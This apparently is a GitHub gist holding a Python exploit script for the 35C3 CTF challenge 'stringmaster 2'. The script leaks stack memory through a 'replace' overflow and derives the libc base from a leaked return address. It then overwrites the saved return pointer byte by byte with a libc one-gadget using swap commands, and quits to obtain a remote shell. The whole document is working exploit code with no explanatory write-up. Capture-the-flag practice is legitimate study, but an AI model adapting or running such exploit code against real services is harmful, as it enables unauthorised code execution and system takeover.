35C3 - stringmaster 2 - my python exploit
import time | |
import struct | |
import socket | |
# For finding hex sequence in given subarray (i.e finding pointers' addresses by their supposed value) | |
def find_index_of_subarray(arr, subarr): | |
index = 0 | |
for byte in arr: | |
if len(arr) - index < len(subarr): | |
return -1 | |
if byte == subarr[0]: | |
# Checking if arrays are equal | |
if arr[index:index + len(subarr)] == subarr: | |
return index | |
index += 1 | |
return -1 | |
# For returning sub-bytearray of given length at given index of given bytearray: | |
def get_subarray_at_address(length, index, byte_array): | |
if index + length > len(byte_array): | |
return -1 | |
else: | |
return byte_array[index:index + length] | |
# For finding byte index for given byte value in given array | |
# If found value but it is in protected line, pass this line. | |
def find_byte_index(byte_value, byte_array, protected_lines): | |
index = 0 | |
for byte in byte_array: | |
if byte == byte_value: | |
not_protected_line = True | |
for line in protected_lines: | |
if (not (index < line * 8) and not (index > (line + 1) * 8)): | |
not_protected_line = False | |
break | |
if not_protected_line: | |
return index | |
index += 1 | |
return -1 | |
class Client: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
encoding = 'UTF-8' | |
decode_error_handling = 'ignore' | |
host = '' | |
port = 0 | |
last_retrieved_bytes = bytearray(0) | |
buffer_size = 512 | |
def __init__(self, host, port): | |
self.host = host | |
self.port = port | |
def connect(self): | |
self.sock.connect((self.host, self.port)) | |
def disconnect(self): | |
self.sock.close() | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
def wait_for_any_input(self): | |
print('\033[92m' + 'Waiting for any input.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
buffer = self.sock.recv(self.buffer_size) | |
for byte in buffer: | |
self.last_retrieved_bytes.append(byte) | |
input_as_string = buffer.decode(self.encoding, self.decode_error_handling) | |
print(input_as_string) | |
def wait_for_prompt(self): | |
print('\033[94m' + 'Waiting for prompt.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
input_as_string = '' | |
retrieved_full_prompt = False | |
ending_normal = 'quit \n> ' | |
ending_quit = 'You lost.' | |
while not retrieved_full_prompt: | |
buffer = self.sock.recv(self.buffer_size) | |
self.last_retrieved_bytes += buffer | |
input_as_string += buffer.decode(self.encoding, self.decode_error_handling) | |
retrieved_full_prompt = \ | |
(input_as_string.find(ending_normal) != -1) or (input_as_string.find(ending_quit) != -1) | |
print(input_as_string) | |
def retrieved_bytes_truncate_prompt(self): | |
beginning = 'Enter the command you want to execute:'.encode(self.encoding) | |
index = find_index_of_subarray(self.last_retrieved_bytes, beginning) | |
self.last_retrieved_bytes = self.last_retrieved_bytes[:index] | |
def prettyprint_retrieved_bytes(self): | |
offset = len(self.last_retrieved_bytes) | |
line = 1 | |
string = '' | |
# Don't worry, it's just an ANSI color code | |
string += '\033[91m' | |
while offset > 0: | |
str_line = 'Line ' + str(line).zfill(3) + ': ' | |
if offset >= 8: | |
for a in range(0, 8): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
else: | |
for a in range(0, offset): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
string += str_line + '\n' | |
offset -= 8 | |
line += 1 | |
string += '\033[0m' | |
print(string) | |
return string | |
def send(self, command_bytearr): | |
print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m') | |
self.sock.sendall(command_bytearr) | |
def send_replace_overflow(self): | |
self.send('replace X a\n'.encode(self.encoding)) | |
def send_replace(self, char_1, bytearr): | |
command = ('replace ' + char_1 + ' ').encode(self.encoding) | |
command += bytearr | |
command += (' \n').encode(self.encoding) | |
print('Sending: ' + str(command)) | |
self.send(command) | |
def send_swap(self, index_1, index_2): | |
self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding)) | |
def send_print(self): | |
self.send(('print\n').encode(self.encoding)) | |
def send_quit(self): | |
self.send(('quit\n').encode(self.encoding)) | |
def send_ls(self): | |
self.send(('ls\n').encode(self.encoding)) | |
# 17 * 8 is end of the 17-th octet (counting from zero), so practically it's 18-th line | |
return_pointer_index = 17 * 8 | |
libc_main_231_absolute = 0x21ab0 + 231 | |
client = Client('localhost', 22225) | |
client.connect() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.send_replace_overflow() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
client.prettyprint_retrieved_bytes() | |
copy = client.last_retrieved_bytes | |
libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, copy) | |
libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0] | |
print('libc_main_231_addr is : ' + str(hex(libc_main_231))) | |
libc_base = libc_main_231 - libc_main_231_absolute | |
print('libc base is: ' + str(hex(libc_base))) | |
gadget_int = 0x4f2c5 + libc_base | |
print('gadget is: ' + str(hex(gadget_int))) | |
gadget_bytes = struct.pack('>Q', gadget_int) | |
# time.sleep(2) | |
# Firstly, for every byte of gadget, put its value on the beginning of the leaked data | |
# to make these bytes present on the stack, so we could use swap command in the second next step. | |
offset = 0 | |
for byte in gadget_bytes: | |
copy = client.last_retrieved_bytes | |
s = chr(copy[offset]) | |
bytearr = get_subarray_at_address(1, offset, gadget_bytes) | |
client.send_replace(s, bytearr) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
# Now, for every byte of gadget, swap its value with corresponding return pointer byte | |
offset = 0 | |
for byte in reversed(gadget_bytes): | |
print('Swapping: ' + str(hex(byte))) | |
index = find_byte_index(byte, client.last_retrieved_bytes, [17]) | |
if index == -1: | |
print('Index for ' + str(byte) + ' not found!') | |
exit(-1) | |
else: | |
client.send_swap(return_pointer_index + offset, index) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
print('Replaced all bytes for return pointer to libc_system') | |
client.send_quit() | |
client.wait_for_prompt() | |
client.send_ls() | |
print('This should be shell.') | |
client.wait_for_any_input() | |
print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes))) | |
print(client.last_retrieved_bytes.decode('utf-8')) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment